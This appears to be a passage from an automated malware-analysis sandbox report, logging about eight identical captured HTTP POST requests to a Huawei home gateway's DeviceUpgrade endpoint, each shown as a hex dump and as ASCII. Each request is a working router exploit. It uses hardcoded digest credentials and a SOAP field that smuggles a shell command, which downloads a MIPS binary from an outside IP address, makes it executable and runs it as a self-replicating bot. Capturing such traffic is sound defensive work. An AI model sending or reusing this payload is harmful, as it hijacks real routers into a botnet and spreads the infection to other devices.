6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope 